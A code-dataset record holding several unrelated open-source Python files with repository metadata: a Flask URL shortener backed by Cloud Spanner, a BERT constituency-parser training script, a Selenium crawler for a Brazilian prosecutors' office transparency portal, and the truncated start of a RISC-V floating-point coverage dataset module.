ae2d83d799c5f8fa35b6b4f1abcb0b05bbb6cad6 | 3,415 | py | Python | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | 5 | 2020-02-10T15:54:24.000Z | 2020-02-12T10:04:38.000Z | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | null | null | null | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | null | null | null | import os
import re
import logging
from binascii import crc_hqx
from datetime import datetime
from flask import Flask, request, render_template, redirect
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from flask_bootstrap import Bootstrap
from gevent.pywsgi import WSGIServer
from google.cloud import spanner
from google.api_core.exceptions import AlreadyExists
secret_key = os.urandom(32)
app = Flask(__name__)
Bootstrap(app)
app.secret_key = secret_key.hex()
spanner_client = spanner.Client()
app_settings = os.environ.get('APP_SETTINGS')
instance_id = os.environ.get('SPANNER_INSTANCE', 'runfaster-spanner')
database_id = os.environ.get('SPANNER_DATABASE', 'runfaster')
database = spanner_client.instance(instance_id).database(database_id, ddl_statements=["""CREATE TABLE urls (
shorten STRING(MAX) NOT NULL,
created_at TIMESTAMP NOT NULL OPTIONS (allow_commit_timestamp=true),
source STRING(MAX) NOT NULL,
) PRIMARY KEY (shorten)
"""])
source_regex = re.compile("https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+")
shorten_regex = re.compile("[a-zA-Z0-9]")
@app.route('/<string:shorten>', methods=['GET'])
@app.route('/', methods=['GET', 'POST'])
if __name__ == '__main__':
main()
| 28.940678 | 108 | 0.660908 | import os
import re
import logging
from binascii import crc_hqx
from datetime import datetime
from flask import Flask, request, render_template, redirect
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from flask_bootstrap import Bootstrap
from gevent.pywsgi import WSGIServer
from google.cloud import spanner
from google.api_core.exceptions import AlreadyExists
secret_key = os.urandom(32)
app = Flask(__name__)
Bootstrap(app)
app.secret_key = secret_key.hex()
spanner_client = spanner.Client()
app_settings = os.environ.get('APP_SETTINGS')
instance_id = os.environ.get('SPANNER_INSTANCE', 'runfaster-spanner')
database_id = os.environ.get('SPANNER_DATABASE', 'runfaster')
database = spanner_client.instance(instance_id).database(database_id, ddl_statements=["""CREATE TABLE urls (
shorten STRING(MAX) NOT NULL,
created_at TIMESTAMP NOT NULL OPTIONS (allow_commit_timestamp=true),
source STRING(MAX) NOT NULL,
) PRIMARY KEY (shorten)
"""])
source_regex = re.compile("https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+")
shorten_regex = re.compile("[a-zA-Z0-9]")
def get_source(shorten: str):
if shorten_regex.match(shorten) is None:
raise ValueError("wrong input")
with database.snapshot() as snapshot:
cursor = snapshot.execute_sql(
f"SELECT source FROM urls WHERE shorten=@shorten",
params={'shorten': shorten},
param_types={'shorten': spanner.param_types.STRING}
)
results = list(cursor)
return results[0][0]
def _generate_shorten(source: str):
return hex(crc_hqx(source.encode(), 0))[2:]
def create_shorten(source: str):
if source_regex.match(source) is None:
raise ValueError("wrong input")
shorten = _generate_shorten(source)
try:
with database.batch() as batch:
batch.insert(
table='urls',
columns=('shorten', 'source', 'created_at'),
values=[(shorten, source, datetime.utcnow())]
)
except AlreadyExists:
...
return shorten
class UrlForm(FlaskForm):
source = StringField('source', validators=[DataRequired()])
@app.route('/<string:shorten>', methods=['GET'])
def redirect_to_source(shorten: str):
try:
source = get_source(shorten)
return redirect(source)
except ValueError:
return render_template('400.html'), 400
except IndexError:
return render_template('404.html'), 404
except Exception:
return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def index():
try:
form = UrlForm()
shorten = None
if form.validate_on_submit():
try:
source = form.source.data
shorten = create_shorten(source)
except ValueError:
return render_template('400.html'), 400
return render_template('index.html', form=form, shorten=shorten, base_url=request.base_url)
except Exception:
return render_template('500.html')
def main():
if app_settings == 'dev':
app.logger.setLevel(logging.DEBUG)
app.run(debug=True, host='localhost', port=8080)
else:
port = int(os.environ.get('PORT', '8080'))
server = WSGIServer(('0.0.0.0', port), app)
server.serve_forever()
if __name__ == '__main__':
main()
| 1,915 | 68 | 159 |
1a6c59844b6771714b26864a5626a9014e3bbc54 | 17,973 | py | Python | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | null | null | null | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | 1 | 2020-06-03T19:26:22.000Z | 2020-06-04T06:57:16.000Z | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | 1 | 2020-12-26T12:07:44.000Z | 2020-12-26T12:07:44.000Z | # -*- coding: utf-8 -*-
import json
import os
import random
import click
import neptune
import numpy as np
import regex
import torch
from loguru import logger
from neptune.exceptions import NoExperimentContext
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from tqdm import tqdm, trange
from bert.optimization import BertAdam
from bert.tokenization import BertTokenizer
from eval import evalb
from label_encoder import LabelEncoder
from model import ChartParser
from trees import InternalParseNode, load_trees
try:
from apex import amp
except ImportError:
pass
MODEL_FILENAME = "model.bin"
BERT_TOKEN_MAPPING = {
"-LRB-": "(",
"-RRB-": ")",
"-LCB-": "{",
"-RCB-": "}",
"-LSB-": "[",
"-RSB-": "]",
}
@click.command()
@click.option("--train_file", required=True, type=click.Path())
@click.option("--dev_file", required=True, type=click.Path())
@click.option("--test_file", required=True, type=click.Path())
@click.option("--output_dir", required=True, type=click.Path())
@click.option("--bert_model", required=True, type=click.Path())
@click.option("--lstm_layers", default=2, show_default=True, type=click.INT)
@click.option("--lstm_dim", default=250, show_default=True, type=click.INT)
@click.option("--tag_embedding_dim", default=50, show_default=True, type=click.INT)
@click.option("--label_hidden_dim", default=250, show_default=True, type=click.INT)
@click.option("--dropout_prob", default=0.4, show_default=True, type=click.FLOAT)
@click.option("--batch_size", default=32, show_default=True, type=click.INT)
@click.option("--num_epochs", default=20, show_default=True, type=click.INT)
@click.option("--learning_rate", default=5e-5, show_default=True, type=click.FLOAT)
@click.option("--warmup_proportion", default=0.1, show_default=True, type=click.FLOAT)
@click.option(
"--gradient_accumulation_steps", default=1, show_default=True, type=click.INT
)
@click.option("--seed", default=42, show_default=True, type=click.INT)
@click.option("--device", default=0, show_default=True, type=click.INT)
@click.option("--fp16", is_flag=True)
@click.option("--do_eval", is_flag=True)
@click.option("--resume", is_flag=True)
@click.option("--preload", is_flag=True)
@click.option("--freeze_bert", is_flag=True)
if __name__ == "__main__":
neptune.init(project_qualified_name=os.getenv("NEPTUNE_PROJECT_NAME"))
try:
# main(
# [
# "--train_file=corpora/WSJ-PTB/02-21.10way.clean.train",
# "--dev_file=corpora/WSJ-PTB/22.auto.clean.dev",
# "--test_file=corpora/WSJ-PTB/23.auto.clean.test",
# "--output_dir=outputs",
# "--bert_model=models/bert-base-multilingual-cased",
# "--batch_size=32",
# "--num_epochs=20",
# "--learning_rate=3e-5",
# # "--fp16",
# # "--do_eval",
# ]
# )
main()
finally:
try:
neptune.stop()
except NoExperimentContext:
pass
| 33.038603 | 93 | 0.589829 | # -*- coding: utf-8 -*-
import json
import os
import random
import click
import neptune
import numpy as np
import regex
import torch
from loguru import logger
from neptune.exceptions import NoExperimentContext
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from tqdm import tqdm, trange
from bert.optimization import BertAdam
from bert.tokenization import BertTokenizer
from eval import evalb
from label_encoder import LabelEncoder
from model import ChartParser
from trees import InternalParseNode, load_trees
try:
from apex import amp
except ImportError:
pass
MODEL_FILENAME = "model.bin"
BERT_TOKEN_MAPPING = {
"-LRB-": "(",
"-RRB-": ")",
"-LCB-": "{",
"-RCB-": "}",
"-LSB-": "[",
"-RSB-": "]",
}
def create_dataloader(sentences, batch_size, tag_encoder, tokenizer, is_eval):
features = []
for sentence in sentences:
tokens = []
tags = []
sections = []
for tag, phrase in sentence:
subtokens = []
for token in regex.split(
r"(?<=[^\W_])_(?=[^\W_])", phrase, flags=regex.FULLCASE
):
for subtoken in tokenizer.tokenize(
BERT_TOKEN_MAPPING.get(token, token)
):
subtokens.append(subtoken)
tokens.extend(subtokens)
tags.append(tag_encoder.transform(tag, unknown_label="[UNK]"))
sections.append(len(subtokens))
ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens + ["[SEP]"])
attention_mask = [1] * len(ids)
features.append(
{
"ids": ids,
"attention_mask": attention_mask,
"tags": tags,
"sections": sections,
}
)
dataset = TensorDataset(torch.arange(len(features), dtype=torch.long))
sampler = SequentialSampler(dataset) if is_eval else RandomSampler(dataset)
dataloader = DataLoader(dataset, sampler=sampler, batch_size=batch_size)
return dataloader, features
def prepare_batch_input(indices, features, trees, sentences, tag_encoder, device):
_ids = []
_attention_masks = []
_tags = []
_sections = []
_trees = []
_sentences = []
ids_padding_size = 0
tags_padding_size = 0
for _id in indices:
_ids.append(features[_id]["ids"])
_attention_masks.append(features[_id]["attention_mask"])
_tags.append(features[_id]["tags"])
_sections.append(features[_id]["sections"])
_trees.append(trees[_id])
_sentences.append(sentences[_id])
ids_padding_size = max(ids_padding_size, len(features[_id]["ids"]))
tags_padding_size = max(tags_padding_size, len(features[_id]["tags"]))
# Zero-pad
for _id, _attention_mask, _tag in zip(_ids, _attention_masks, _tags):
padding_size = ids_padding_size - len(_id)
_id += [0] * padding_size
_attention_mask += [0] * padding_size
_tag += [tag_encoder.transform("[PAD]")] * (tags_padding_size - len(_tag))
_ids = torch.tensor(_ids, dtype=torch.long, device=device)
_attention_masks = torch.tensor(_attention_masks, dtype=torch.long, device=device)
_tags = torch.tensor(_tags, dtype=torch.long, device=device)
return _ids, _attention_masks, _tags, _sections, _trees, _sentences
def eval(
model,
eval_dataloader,
eval_features,
eval_trees,
eval_sentences,
tag_encoder,
device,
):
# Evaluation phase
model.eval()
all_predicted_trees = []
for indices, *_ in tqdm(eval_dataloader, desc="Iteration"):
ids, attention_masks, tags, sections, _, sentences = prepare_batch_input(
indices=indices,
features=eval_features,
trees=eval_trees,
sentences=eval_sentences,
tag_encoder=tag_encoder,
device=device,
)
with torch.no_grad():
predicted_trees = model(
ids=ids,
attention_masks=attention_masks,
tags=tags,
sections=sections,
sentences=sentences,
gold_trees=None,
)
for predicted_tree in predicted_trees:
all_predicted_trees.append(predicted_tree.convert())
return evalb(eval_trees, all_predicted_trees)
@click.command()
@click.option("--train_file", required=True, type=click.Path())
@click.option("--dev_file", required=True, type=click.Path())
@click.option("--test_file", required=True, type=click.Path())
@click.option("--output_dir", required=True, type=click.Path())
@click.option("--bert_model", required=True, type=click.Path())
@click.option("--lstm_layers", default=2, show_default=True, type=click.INT)
@click.option("--lstm_dim", default=250, show_default=True, type=click.INT)
@click.option("--tag_embedding_dim", default=50, show_default=True, type=click.INT)
@click.option("--label_hidden_dim", default=250, show_default=True, type=click.INT)
@click.option("--dropout_prob", default=0.4, show_default=True, type=click.FLOAT)
@click.option("--batch_size", default=32, show_default=True, type=click.INT)
@click.option("--num_epochs", default=20, show_default=True, type=click.INT)
@click.option("--learning_rate", default=5e-5, show_default=True, type=click.FLOAT)
@click.option("--warmup_proportion", default=0.1, show_default=True, type=click.FLOAT)
@click.option(
"--gradient_accumulation_steps", default=1, show_default=True, type=click.INT
)
@click.option("--seed", default=42, show_default=True, type=click.INT)
@click.option("--device", default=0, show_default=True, type=click.INT)
@click.option("--fp16", is_flag=True)
@click.option("--do_eval", is_flag=True)
@click.option("--resume", is_flag=True)
@click.option("--preload", is_flag=True)
@click.option("--freeze_bert", is_flag=True)
def main(*_, **kwargs):
use_cuda = torch.cuda.is_available() and kwargs["device"] >= 0
device = torch.device("cuda:" + str(kwargs["device"]) if use_cuda else "cpu")
if use_cuda:
torch.cuda.set_device(device)
kwargs["use_cuda"] = use_cuda
neptune.create_experiment(
name="bert-span-parser",
upload_source_files=[],
params={k: str(v) if isinstance(v, bool) else v for k, v in kwargs.items()},
)
logger.info("Settings: {}", json.dumps(kwargs, indent=2, ensure_ascii=False))
# For reproducibility
os.environ["PYTHONHASHSEED"] = str(kwargs["seed"])
random.seed(kwargs["seed"])
np.random.seed(kwargs["seed"])
torch.manual_seed(kwargs["seed"])
torch.cuda.manual_seed_all(kwargs["seed"])
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# Prepare and load data
tokenizer = BertTokenizer.from_pretrained(kwargs["bert_model"], do_lower_case=False)
logger.info("Loading data...")
train_treebank = load_trees(kwargs["train_file"])
dev_treebank = load_trees(kwargs["dev_file"])
test_treebank = load_trees(kwargs["test_file"])
logger.info(
"Loaded {:,} train, {:,} dev, and {:,} test examples!",
len(train_treebank),
len(dev_treebank),
len(test_treebank),
)
logger.info("Preprocessing data...")
train_parse = [tree.convert() for tree in train_treebank]
train_sentences = [
[(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in train_parse
]
dev_sentences = [
[(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in dev_treebank
]
test_sentences = [
[(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in test_treebank
]
logger.info("Data preprocessed!")
logger.info("Preparing data for training...")
tags = []
labels = []
for tree in train_parse:
nodes = [tree]
while nodes:
node = nodes.pop()
if isinstance(node, InternalParseNode):
labels.append(node.label)
nodes.extend(reversed(node.children))
else:
tags.append(node.tag)
tag_encoder = LabelEncoder()
tag_encoder.fit(tags, reserved_labels=["[PAD]", "[UNK]"])
label_encoder = LabelEncoder()
label_encoder.fit(labels, reserved_labels=[()])
logger.info("Data prepared!")
# Settings
num_train_optimization_steps = kwargs["num_epochs"] * (
(len(train_parse) - 1) // kwargs["batch_size"] + 1
)
kwargs["batch_size"] //= kwargs["gradient_accumulation_steps"]
logger.info("Creating dataloaders for training...")
train_dataloader, train_features = create_dataloader(
sentences=train_sentences,
batch_size=kwargs["batch_size"],
tag_encoder=tag_encoder,
tokenizer=tokenizer,
is_eval=False,
)
dev_dataloader, dev_features = create_dataloader(
sentences=dev_sentences,
batch_size=kwargs["batch_size"],
tag_encoder=tag_encoder,
tokenizer=tokenizer,
is_eval=True,
)
test_dataloader, test_features = create_dataloader(
sentences=test_sentences,
batch_size=kwargs["batch_size"],
tag_encoder=tag_encoder,
tokenizer=tokenizer,
is_eval=True,
)
logger.info("Dataloaders created!")
# Initialize model
model = ChartParser.from_pretrained(
kwargs["bert_model"],
tag_encoder=tag_encoder,
label_encoder=label_encoder,
lstm_layers=kwargs["lstm_layers"],
lstm_dim=kwargs["lstm_dim"],
tag_embedding_dim=kwargs["tag_embedding_dim"],
label_hidden_dim=kwargs["label_hidden_dim"],
dropout_prob=kwargs["dropout_prob"],
)
model.to(device)
# Prepare optimizer
param_optimizers = list(model.named_parameters())
if kwargs["freeze_bert"]:
for p in model.bert.parameters():
p.requires_grad = False
param_optimizers = [(n, p) for n, p in param_optimizers if p.requires_grad]
# Hack to remove pooler, which is not used thus it produce None grad that break apex
param_optimizers = [n for n in param_optimizers if "pooler" not in n[0]]
no_decay = ["bias", "LayerNorm.bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [
p for n, p in param_optimizers if not any(nd in n for nd in no_decay)
],
"weight_decay": 0.01,
},
{
"params": [
p for n, p in param_optimizers if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = BertAdam(
optimizer_grouped_parameters,
lr=kwargs["learning_rate"],
warmup=kwargs["warmup_proportion"],
t_total=num_train_optimization_steps,
)
if kwargs["fp16"]:
model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
pretrained_model_file = os.path.join(kwargs["output_dir"], MODEL_FILENAME)
if kwargs["do_eval"]:
assert os.path.isfile(
pretrained_model_file
), "Pretrained model file does not exist!"
logger.info("Loading pretrained model from {}", pretrained_model_file)
# Load model from file
params = torch.load(pretrained_model_file, map_location=device)
model.load_state_dict(params["model"])
logger.info(
"Loaded pretrained model (Epoch: {:,}, Fscore: {:.2f})",
params["epoch"],
params["fscore"],
)
eval_score = eval(
model=model,
eval_dataloader=test_dataloader,
eval_features=test_features,
eval_trees=test_treebank,
eval_sentences=test_sentences,
tag_encoder=tag_encoder,
device=device,
)
neptune.send_metric("test_eval_precision", eval_score.precision())
neptune.send_metric("test_eval_recall", eval_score.recall())
neptune.send_metric("test_eval_fscore", eval_score.fscore())
tqdm.write("Evaluation score: {}".format(str(eval_score)))
else:
# Training phase
global_steps = 0
start_epoch = 0
best_dev_fscore = 0
if kwargs["preload"] or kwargs["resume"]:
assert os.path.isfile(
pretrained_model_file
), "Pretrained model file does not exist!"
logger.info("Resuming model from {}", pretrained_model_file)
# Load model from file
params = torch.load(pretrained_model_file, map_location=device)
model.load_state_dict(params["model"])
if kwargs["resume"]:
optimizer.load_state_dict(params["optimizer"])
torch.cuda.set_rng_state_all(
[state.cpu() for state in params["torch_cuda_random_state_all"]]
)
torch.set_rng_state(params["torch_random_state"].cpu())
np.random.set_state(params["np_random_state"])
random.setstate(params["random_state"])
global_steps = params["global_steps"]
start_epoch = params["epoch"] + 1
best_dev_fscore = params["fscore"]
else:
assert not os.path.isfile(
pretrained_model_file
), "Please remove or move the pretrained model file to another place!"
for epoch in trange(start_epoch, kwargs["num_epochs"], desc="Epoch"):
model.train()
train_loss = 0
num_train_steps = 0
for step, (indices, *_) in enumerate(
tqdm(train_dataloader, desc="Iteration")
):
ids, attention_masks, tags, sections, trees, sentences = prepare_batch_input(
indices=indices,
features=train_features,
trees=train_parse,
sentences=train_sentences,
tag_encoder=tag_encoder,
device=device,
)
loss = model(
ids=ids,
attention_masks=attention_masks,
tags=tags,
sections=sections,
sentences=sentences,
gold_trees=trees,
)
if kwargs["gradient_accumulation_steps"] > 1:
loss /= kwargs["gradient_accumulation_steps"]
if kwargs["fp16"]:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
train_loss += loss.item()
num_train_steps += 1
if (step + 1) % kwargs["gradient_accumulation_steps"] == 0:
optimizer.step()
optimizer.zero_grad()
global_steps += 1
# Write logs
neptune.send_metric("train_loss", epoch, train_loss / num_train_steps)
neptune.send_metric("global_steps", epoch, global_steps)
tqdm.write(
"Epoch: {:,} - Train loss: {:.4f} - Global steps: {:,}".format(
epoch, train_loss / num_train_steps, global_steps
)
)
# Evaluate
eval_score = eval(
model=model,
eval_dataloader=dev_dataloader,
eval_features=dev_features,
eval_trees=dev_treebank,
eval_sentences=dev_sentences,
tag_encoder=tag_encoder,
device=device,
)
neptune.send_metric("eval_precision", epoch, eval_score.precision())
neptune.send_metric("eval_recall", epoch, eval_score.recall())
neptune.send_metric("eval_fscore", epoch, eval_score.fscore())
tqdm.write(
"Epoch: {:,} - Evaluation score: {}".format(epoch, str(eval_score))
)
# Save best model
if eval_score.fscore() > best_dev_fscore:
best_dev_fscore = eval_score.fscore()
tqdm.write("** Saving model...")
os.makedirs(kwargs["output_dir"], exist_ok=True)
torch.save(
{
"epoch": epoch,
"global_steps": global_steps,
"fscore": best_dev_fscore,
"random_state": random.getstate(),
"np_random_state": np.random.get_state(),
"torch_random_state": torch.get_rng_state(),
"torch_cuda_random_state_all": torch.cuda.get_rng_state_all(),
"optimizer": optimizer.state_dict(),
"model": (
model.module if hasattr(model, "module") else model
).state_dict(),
},
pretrained_model_file,
)
tqdm.write("** Best evaluation fscore: {:.2f}".format(best_dev_fscore))
if __name__ == "__main__":
neptune.init(project_qualified_name=os.getenv("NEPTUNE_PROJECT_NAME"))
try:
# main(
# [
# "--train_file=corpora/WSJ-PTB/02-21.10way.clean.train",
# "--dev_file=corpora/WSJ-PTB/22.auto.clean.dev",
# "--test_file=corpora/WSJ-PTB/23.auto.clean.test",
# "--output_dir=outputs",
# "--bert_model=models/bert-base-multilingual-cased",
# "--batch_size=32",
# "--num_epochs=20",
# "--learning_rate=3e-5",
# # "--fp16",
# # "--do_eval",
# ]
# )
main()
finally:
try:
neptune.stop()
except NoExperimentContext:
pass
| 14,796 | 0 | 91 |
86db363519e8523306b63910a6cef58d83620a83 | 5,033 | py | Python | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 18 | 2019-10-30T01:18:40.000Z | 2022-03-15T11:52:45.000Z | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 174 | 2019-11-01T18:57:16.000Z | 2021-09-18T02:35:27.000Z | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 9 | 2020-01-16T16:33:46.000Z | 2022-01-13T07:39:00.000Z | import pathlib
import os
import sys
import time
import shutil
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
BASE_URL = 'https://servicos-portal.mpro.mp.br/web/mp-transparente/contracheque'
BASE_URL_MEMBROS_ATIVOS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FremuneracaoMembrosAtivos.rptdesign&anomes='
BASE_URL_VERBAS_INDENIZATORIAS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FverbasIndenizatoriasMembrosAtivos.rptdesign&anomes='
FLAG = ['remuneracao','verbas-indenizatorias']
REMUNERACAO = 'remuneracao'
VERBAS_INDENIZATORIAS = 'verbas-indenizatorias'
| 39.629921 | 189 | 0.690244 | import pathlib
import os
import sys
import time
import shutil
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
BASE_URL = 'https://servicos-portal.mpro.mp.br/web/mp-transparente/contracheque'
BASE_URL_MEMBROS_ATIVOS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FremuneracaoMembrosAtivos.rptdesign&anomes='
BASE_URL_VERBAS_INDENIZATORIAS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FverbasIndenizatoriasMembrosAtivos.rptdesign&anomes='
FLAG = ['remuneracao','verbas-indenizatorias']
REMUNERACAO = 'remuneracao'
VERBAS_INDENIZATORIAS = 'verbas-indenizatorias'
def crawl(month, year, driver_path, output_path):
files = []
pathlib.Path(output_path).mkdir(exist_ok=True)
driver = setup_driver(driver_path, output_path)
driver.get(BASE_URL)
time.sleep(4)
for flag in FLAG:
file_path = download(str(month), year, output_path, driver, flag)
files.append(file_path)
driver.quit()
return files
def download(month, year, output_path, driver, flag):
driver.get(BASE_URL)
main_tab = driver.window_handles[0]
time.sleep(5)
if(flag == REMUNERACAO):
document_type = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483282_1.3"]/p/span/a')
document_type.click()
else:
document_type = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483282_1.3"]/p/span/span/span/span/span/a')
document_type.click()
time.sleep(3)
select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]')
select_year.click()
if(year in ['2018', '2019', '2020']):
if(year == "2018"):
select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[4]')
elif(year == "2019"):
select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[3]')
elif(year == "2020"):
select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[2]')
select_year.click()
time.sleep(1)
x_path = '//*[@id="selectMes"]/option[' + month + ']'
current_month = driver.find_element(By.XPATH, x_path)
current_month.click()
time.sleep(1)
new_url = ''
# Downloading the file
if(flag == REMUNERACAO):
show_data = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483760_1.9"]/table/tbody/tr[4]/td[1]/input')
show_data.click()
new_url = BASE_URL_MEMBROS_ATIVOS + year + month + '&nome=&cargo=&lotacao='
elif(flag == VERBAS_INDENIZATORIAS):
show_data = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_5313882_1.3"]/table/tbody/tr[4]/td[1]')
show_data.click()
new_url = BASE_URL_VERBAS_INDENIZATORIAS + year + month
new_tab = driver.window_handles[1]
time.sleep(2)
driver.get(new_url)
time.sleep(12)
export = driver.find_element(By.XPATH, '//*[@id="toolbar"]/table/tbody/tr[2]/td[6]/input')
export.click()
time.sleep(4)
select_columns = driver.find_element(By.XPATH, '//*[@id="simpleExportDialogBody"]/tbody/tr[5]/td[2]/table/tbody/tr/td/table/tbody/tr[1]/td')
select_columns.click()
download = driver.find_element(By.XPATH, '//*[@id="simpleExportDataDialogokButton"]')
download.click()
# Formating the filename
time.sleep(5)
file_name = format_filename(output_path, month, year, flag)
time.sleep(3)
# Closing new tabs
driver.switch_to_window(new_tab)
driver.close()
driver.switch_to_window(main_tab)
return file_name
def setup_driver(driver_path, output_path):
# Seting the directorys to be used by selenium
current_directory = os.getcwd()
path_chrome = current_directory + driver_path
path_prefs = output_path
# Attributing the paths to the webdriver
prefs = {"download.default_directory" : path_prefs}
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-setuid-sandbox')
chrome_options.add_experimental_option("prefs", prefs)
return webdriver.Chrome(executable_path = path_chrome, chrome_options = chrome_options)
def format_filename(output_path, month, year, flag):
# Identifying the name of the last downloaded file
filename = max([os.path.join(output_path, f) for f in os.listdir(output_path)], key=os.path.getctime)
# renaming the file properly, according to the month
if(flag == REMUNERACAO):
new_filename = month + "-" + year + "-" +flag +"-membros-ativos" + ".csv"
elif(flag == VERBAS_INDENIZATORIAS):
new_filename = month + "-" + year + "-" +flag + "-membros-ativos" + ".csv"
shutil.move(filename,os.path.join(output_path,r"{}".format(new_filename)))
new_output_path = output_path + "/" + new_filename
return new_output_path | 4,186 | 0 | 93 |
13b108f53e6ed06f423270b6e26e1becc76b81e8 | 185,198 | py | Python | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | from riscv_isac.log import logger
import itertools
import struct
import random
import sys
import math
from decimal import *
fzero = ['0x00000000', '0x80000000']
fminsubnorm = ['0x00000001', '0x80000001']
fsubnorm = ['0x00000002', '0x80000002', '0x007FFFFE', '0x807FFFFE', '0x00555555', '0x80555555']
fmaxsubnorm = ['0x007FFFFF', '0x807FFFFF']
fminnorm = ['0x00800000', '0x80800000']
fnorm = ['0x00800001', '0x80800001', '0x00855555', '0x80855555', '0x008AAAAA', '0x808AAAAA', '0x55000000', '0xD5000000', '0x2A000000', '0xAA000000']
fmaxnorm = ['0x7F7FFFFF', '0xFF7FFFFF']
finfinity = ['0x7F800000', '0xFF800000']
fdefaultnan = ['0x7FC00000', '0xFFC00000']
fqnan = ['0x7FC00001', '0xFFC00001', '0x7FC55555', '0xFFC55555']
fsnan = ['0x7F800001', '0xFF800001', '0x7FAAAAAA', '0xFFAAAAAA']
fone = ['0x3F800000', '0xBF800000']
dzero = ['0x0000000000000000', '0x8000000000000000']
dminsubnorm = ['0x0000000000000001', '0x8000000000000001']
dsubnorm = ['0x0000000000000002', '0x8000000000000002','0x0008000000000000', '0x0008000000000002', '0x0001000000000000', '0x8001000000000000','0x8001000000000003','0x8001000000000007']
dmaxsubnorm = ['0x000FFFFFFFFFFFFF', '0x800FFFFFFFFFFFFF']
dminnorm = ['0x0010000000000000', '0x8010000000000000']
dnorm = ['0x0010000000000002', '0x8010000000000002', '0x0011000000000000', '0x8011000000000000', '0x0018000000000000', '0x8018000000000000','0x8018000000000005','0x8018000000000007']
dmaxnorm = ['0x7FEFFFFFFFFFFFFF', '0xFFEFFFFFFFFFFFFF']
dinfinity = ['0x7FF0000000000000', '0xFFF0000000000000']
ddefaultnan = ['0x7FF8000000000000', '0xFFF8000000000000']
dqnan = ['0x7FF8000000000001', '0xFFF8000000000001', '0x7FFC000000000001', '0xFFFC000000000001']
dsnan = ['0x7FF0000000000001', '0xFFF0000000000001', '0x7FF4AAAAAAAAAAAA', '0xFFF4AAAAAAAAAAAA']
done = ['0x3FF0000000000000', '0xBF80000000000000']
rounding_modes = ['0','1','2','3','4']
def ibm_b1(flen, opcode, ops):
'''
IBM Model B1 Definition:
Test all combinations of floating-point basic types, positive and negative, for
each of the inputs. The basic types are Zero, One, MinSubNorm, SubNorm,
MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, and
SNaN.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operands =>
[Zero, One, MinSubNorm, SubNorm, MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, SNaN]
Implementation:
- Dependent on the value of flen, a predefined dataset of floating point values are added.
- Using the itertools package, an iterative multiplication is performed with two lists to create an exhaustive combination of all the operand values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with the respective rounding mode for that particular opcode.
'''
if flen == 32:
